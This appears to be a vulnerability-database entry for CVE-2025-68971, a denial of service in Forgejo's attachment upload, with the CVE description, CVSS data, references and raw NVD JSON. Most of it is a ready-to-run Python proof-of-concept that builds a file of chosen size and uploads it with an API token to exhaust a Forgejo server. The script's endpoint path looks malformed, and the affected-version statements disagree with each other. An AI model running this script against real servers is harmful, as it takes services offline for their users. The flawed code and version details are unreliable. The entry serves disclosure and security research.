CVE-2025-68971

Description

In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release).

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Forgejo < 13.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-68971 PoC - Forgejo Attachment Upload DoS
This PoC demonstrates uploading a large file to trigger DoS in Forgejo < 13.0.3
"""
import requests
import sys
import os

def create_large_file(size_mb=1024):
    """Generate a large file for upload"""
    filename = 'large_test_file.bin'
    chunk_size = 1024 * 1024  # 1MB chunks
    with open(filename, 'wb') as f:
        for _ in range(size_mb):
            f.write(b'\x00' * chunk_size)
    return filename

def upload_large_attachment(base_url, token, issue_id, filename):
    """
    Upload large file as attachment to trigger DoS
    """
    upload_url = f"{base_url}/api/v1/repos/issues/attachments"
    headers = {
        'Authorization': f'token {token}',
        'Accept': 'application/json'
    }
    
    with open(filename, 'rb') as f:
        files = {'file': (filename, f)}
        data = {'issue_id': issue_id}
        
        print(f"[*] Uploading large file to {upload_url}...")
        print(f"[*] File size: {os.path.getsize(filename) / (1024*1024):.2f} MB")
        
        try:
            response = requests.post(upload_url, headers=headers, files=files, data=data, timeout=300)
            print(f"[+] Response status: {response.status_code}")
            if response.status_code == 200:
                print("[+] File uploaded successfully - DoS condition triggered")
            return response
        except requests.exceptions.RequestException as e:
            print(f"[-] Upload failed: {e}")
            return None

def main():
    if len(sys.argv) < 5:
        print("Usage: python3 cve-2025-68971-poc.py <forgejo_url> <token> <issue_id> <file_size_mb>")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    token = sys.argv[2]
    issue_id = sys.argv[3]
    size_mb = int(sys.argv[4])
    
    print(f"[*] Creating {size_mb}MB test file...")
    filename = create_large_file(size_mb)
    
    try:
        upload_large_attachment(base_url, token, issue_id, filename)
    finally:
        if os.path.exists(filename):
            os.remove(filename)
            print(f"[*] Cleaned up {filename}")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68971
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68971
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68971/
[4] VulDB https://vuldb.com/cve/CVE-2025-68971
[5] https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=291973
[6] https://codeberg.org/forgejo/forgejo
[7] https://zenodo.org/records/18945481
[8] https://zenodo.org/records/19058493

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68971", "sourceIdentifier": "[email protected]", "published": "2026-03-16T20:16:14.863", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release)."}, {"lang": "es", "value": "En Forgejo hasta la versión 13.0.3, el componente de adjuntos permite una denegación de servicio al subir un archivo adjunto de varios gigabytes (por ejemplo, para asociarlo con una incidencia o una versión)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=291973", "source": "[email protected]"}, {"url": "https://codeberg.org/forgejo/forgejo", "source": "[email protected]"}, {"url": "https://zenodo.org/records/18945481", "source": "[email protected]"}, {"url": "https://zenodo.org/records/19058493", "source": "[email protected]"}]}}